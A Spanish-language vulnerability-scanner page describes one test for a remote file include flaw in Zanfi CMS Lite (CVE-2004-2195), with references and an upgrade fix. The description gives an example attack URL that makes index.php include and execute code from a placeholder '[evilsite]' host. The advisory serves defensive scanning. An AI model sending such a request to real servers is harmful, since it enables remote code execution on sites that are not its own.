![]() |
Inicial ▼ Bookkeeping
Online ▼ Auditorias ▼
DNS
Administrado ▼
Acerca de DNS
Ordenar/Renovar
Preguntas Frecuentes
AUP
Dynamic DNS Clients
Configurar Dominios Dynamic DNS Update Password Monitoreo
de Redes ▼
Enterprise
Avanzado
Estándarr
Prueba
Preguntas Frecuentes
Resumen de Precio/Funciones
Ordenar
Muestras
Configure/Status Alert Profiles | ||
ID de Prueba: | 1.3.6.1.4.1.25623.1.0.15452 |
Categoría: | CGI abuses |
Título: | Zanfi CMS Lite Remote File Include |
Resumen: | NOSUMMARY |
Descripción: | Description: The remote host is running Zanfi CMS Lite, a content management system written in PHP. There is a bug in the remote version of this software which may allow an attacker to execute arbitrary commands on the remote host by using a file inclusion bug in the file 'index.php'. An attacker may execute arbitrary commands by requesting : http://www.example.com/index.php?inc=http://[evilsite]/commands which will make the remote script include the file commands.php and execute it. Solution : Upgrade the newest version of this software Risk factor : High |
Referencia Cruzada: |
BugTraq ID: 11362 Common Vulnerability Exposure (CVE) ID: CVE-2004-2195 http://www.securityfocus.com/bid/11362 Bugtraq: 20041011 Multiple vulnerabilities in ZanfiCmsLite (Google Search) http://www.securityfocus.com/archive/1/378053 http://www.osvdb.org/10676 http://securitytracker.com/id?1011612 http://secunia.com/advisories/12792 XForce ISS Database: zanficmslite-inc-file-include(17691) https://exchange.xforce.ibmcloud.com/vulnerabilities/17691 |
Copyright | This script is Copyright (C) 2004 Tenable Network Security |
Esta es sólo una de 146377 pruebas de vulnerabilidad en nuestra serie de pruebas. Encuentre más sobre cómo ejecutar una auditoría de seguridad completa. Para ejecutar una prueba gratuita de esta vulnerabilidad contra su sistema, regístrese ahora. |